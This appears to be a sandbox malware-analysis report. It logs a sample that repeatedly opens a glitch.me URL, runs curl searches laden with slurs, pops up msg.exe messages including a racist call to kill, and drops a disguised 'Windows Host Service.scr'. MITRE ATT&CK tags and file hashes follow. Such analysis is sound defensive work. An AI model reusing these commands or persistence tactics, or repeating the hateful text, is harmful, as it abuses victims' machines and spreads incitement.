C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\pcaui.exeC:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""2⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}1⤵
-
C:\Users\Admin\AppData\Local\Windows Host Service.scr"C:\Users\Admin\AppData\Local\Windows Host Service.scr"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
5Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
30KB
MD559a619df295184abc1ac0ba3b15fdcc3
SHA10856e1674cba0be2f3519510ce0b8de22ab58d2b
SHA2569c928a97842e8199b2513f1b96d6ee96bb1ab88ab4ae1d44f0dad5a1ec0aa4dd
SHA51212ed6664ca33c5f88bdff7565aedd2ec952555ec41c66f21bcd7ded095b27a113cc957e4002a2eed70b37dc6920c7bc179b9bb0bc5744a1034e99e0469a0f550
-
Filesize
280B
MD58165d331a65e980c7f75dba657342854
SHA144967c0388744de38b07e07e3a9cb174854eb7bf
SHA25608d7b1fa1c3cdacb73cb9b34bb51a0516bfeac2f10ec54f2f27469d1c97820a9
SHA512ee23180ed03c5042d6e6343ac2181a6d9ffbbb775e1031222e46b4a61eca4f1caf2dab50269271a07b284e270195595c91ce8c43d4cef77c8873845216546e54
-
Filesize
280B
MD502cf1313b32a8ab2f031cee39bee8fc3
SHA1861cc0ab9ff881460dd6433e37075b822aac9355
SHA2567e7fd13903a8d57f314d9e7dab6fa28975050b63f045eb315e96cccaa17d1e61
SHA512f5464c94391bfb590f6755c2ae6896dd459a2a93d778601caebf272438c2ff127ec5de81dcf8efeec65a56609558477afc7be1c4993977a18fde7b915f7a8700
-
Filesize
210KB
MD5bd01400b58e03faaa4db55c0f1f2c5aa
SHA198a182db61d54280db1ca50fbaf799250d13ddf7
SHA256adbb0b3c846d6826f385683f5100a715a8e0e201c5f112316a8dfde4939febb2
SHA512eaf62715a75e8f50df4b2729b9a90ff44934914961466f28df11ac929df5b6b35b5d811b71656cbf416df6bd474ecbbbb294e4c8d370d843bf83a0a170859645
-
Filesize
37KB
MD5ab7fc8ab7d76d79285b17b4d9860cbf0
SHA1b5833d99bda07236d2ad950fe452cf595fbc3c20
SHA25699933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b
SHA512200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf
-
Filesize
20KB
MD5eef911348f13105f1501b48929ef9224
SHA1e8f3fd90ae05a940444a80a6c84cab08245891e3
SHA2565524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8
SHA512ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814
-
Filesize
3KB
MD5bc1f41c23de98dd6669561ee0c825404
SHA11d8e23c2f81efffad5f0f629a22efa77abb5725a
SHA256963bf1577577a0a4e586fc159cc8b69aecb65cd0d2434191625306c74e12af1a
SHA5126c8952c6ac118ac0349091bfd66be831f40c528a4eaf94474ec8b28868b72376c4f15979f365563253292dabac5a7ce8e8b5bceb0ebc853e5277020ca00291f9
-
Filesize
3KB
MD567ad73770a91f3a1362f985da6c1e700
SHA1da22a1ae9cbbbccd9e30c73f98aacb53b6f4750d
SHA25655e7685668dc559704c5ebee8be88173f386500d7d834a590a86089898a295c0
SHA5125fde24b69520205569f609610b2e0d9db77ebeaab14fedafbcf58a97dddbaffc37dc5643ffc53172d6b93f50f64d73daf4d2119338415865ca0844d9241e178c
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
2KB
MD536840753b452a60e140a92ec1fa2c704
SHA160bba0d64b6632aabe416e6ce2d88d91ffd0e611
SHA2563fa658db6e7c2cc96bc279e093a4bd158d4841041c1aa499177b8cb252e867ca
SHA512acf57480d54714579b7fb8424ac6f1b1f85b34a896c67349ec8f3efaccbe9cc69d59563c0604e0b12c8ade5c75a0a6587c5c07760773b9ef75e9679228899b64
-
Filesize
2KB
MD556f018912ebfd66f01fea4ffff1c1115
SHA117a4352ed8edca96b541841b552a44b51cf0600c
SHA25686ef5fa06e294527044bb8a46c31dfeca9bff45267db3f176d1125a7e82d3620
SHA512401b597e44b123b45d19b2ebad0d0abc158211f886bd65363b80130c0b3078311ecb5e3b5009bcf322b2a555ceb40f4d6fa8000193c7358b1884691395646810
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
13KB
MD5e68d5ccb393d8e89cb2a7da15b79175b
SHA19d01c820e869903c84bfe3c7727c69e3d2902105
SHA256bb7ab4128c51c0529567fa2e9a73fe92cd7c336cf943f7499f5c42daeb2f7f03
SHA512d9cad7c90cd1dac66af16fbedd4f55ab2f6b7d4b97c4b9e6717a12e895bb32f9ef644012beca1e9fff885796420ffae002a57a13be356fd1b1675138959a7267
-
Filesize
13KB
MD59df1416794551834d201b4435b8b9fbf
SHA114d81eb53cc5766626f69027e026339a6ac19e78
SHA2561fbc19859b5efc14f08024cdec626c222c38e738f81ec9716f19497debfcfddd
SHA512ad7be4bf99111c5e2fcc80e6840fe1950e2f6014ecb4e943a90854e8d45dea4f9f0434bc42077edc35a7cdd541aadb086ed66e1d360d32e879d1a1c97d3baa5b
-
Filesize
13KB
MD59050e3041028a49d8828239704a11385
SHA10bde9bea638e0a273cb2a36e29ccdc992330554e
SHA256115927b8aeb9da369920e61c1db315fdc48bfc7e1354dcda8e4616a87dde0b2b
SHA512e58b2dee1bbde4022d0d7775eea687239b495ea8f97e5e890f86ccd89586a648cde1247b8866aa080980de68f8b40a2455cf929aa2b748e3bdda3890b291e32a
-
Filesize
32KB
MD5211729595ed5dbe4c5f533c1f5871aff
